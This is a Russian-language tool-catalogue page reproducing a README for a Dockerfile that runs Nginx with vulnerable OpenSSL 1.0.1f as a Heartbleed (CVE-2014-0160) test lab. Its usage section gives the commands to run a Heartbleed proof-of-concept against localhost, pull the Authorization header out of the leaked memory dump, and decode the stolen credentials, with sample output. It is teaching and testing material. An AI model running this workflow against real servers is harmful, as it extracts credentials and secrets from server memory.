Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Heartbleed_Dockerfile_with_Nginx — Dockerfile для тестирования эксплуатации CVE-2014-0160 Heartbleed. | Kitploit
Инструменты/GitHubGitHub/froyo75/heartbleed_dockerfile_with_nginx
Безопасность контейнеровАнализ уязвимостейЭксплуатацияВеб-безопасностьТестирование на ПроникновениеОбучение и Образование
GitHubfroyo75/heartbleed_dockerfile_with_nginx

Heartbleed_Dockerfile_with_Nginx

Dockerfile для тестирования эксплуатации CVE-2014-0160 Heartbleed.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
14 лет назадЕщё не проверено

Тестирование Heartbleed с помощью Nginx Dockerfile

Этот репозиторий содержит Dockerfile Nginx с уязвимой версией OpenSSL (1.0.1f) для тестирования уязвимости CVE-2014-0160 Heartbleed.

Базовый образ Docker

  • debian:latest

Установка

  1. Установите Docker

    • Пример для Debian: apt-get install -y docker
  2. Загрузите из публичного реестра Docker Hub базовый образ Debian: docker pull debian:latest

  3. Соберите образ из Dockerfile: docker build -t heartbleed_nginx_img .

Использование

Запуск контейнера Heartbleed+Nginx

docker run -i -t -p 1500:443 heartbleed_nginx_img

Тестирование уязвимости Heartbleed (CVE-2014-0160) с помощью HTTP Basic Authentication
  1. Загрузите Python-скрипт Heartbleed-poc (Только для целей тестирования!). Это модифицированная версия, первоначально созданная Jared Stafford [email protected]. Спасибо SensePost за этот скрипт.

  2. Откройте две новые вкладки в текущем терминале и выполните:

    • Первая вкладка (Генерация x100 GET запросов с помощью HTTP Basic Auth и команды curl):

      for loop in {0..100..1}; do curl -X GET -s -i -k -u admin:myP@ssword0MG https://127.0.0.1:1500| grep -E "200"; done

      HTTP/1.1 200 OK HTTP/1.1 200 OK HTTP/1.1 200 OK HTTP/1.1 200 OK snipp...

    • Вторая вкладка (Генерация x100 запросов Heartbeat (-n 100) и запись дампа памяти в файл "dump.bin", затем извлечение результата из поля "Authorization" из дампа памяти и, наконец, декодирование строки Base64 в открытый текст ^^):

      python heartbleed-poc.py -f dump.bin -q -n 100 -p 1500 127.0.0.1 && grep -a "^Authorization:" dump.bin | head -n1 | awk -F " " '{print $3}' | tr -d '\n\r' | base64 --decode && echo

      WARNING: server 127.0.0.1 returned more data than it should - server is vulnerable! ... received message: type = 22, ver = 0302, length = 66 ... received message: type = 22, ver = 0302, length = 925 ... received message: type = 22, ver = 0302, length = 331 ... received message: type = 22, ver = 0302, length = 4 ... received message: type = 24, ver = 0302, length = 16384 WARNING: server 127.0.0.1 returned more data than it should - server is vulnerable! snipp... admin:myP@ssword0MG

Скачать инструмент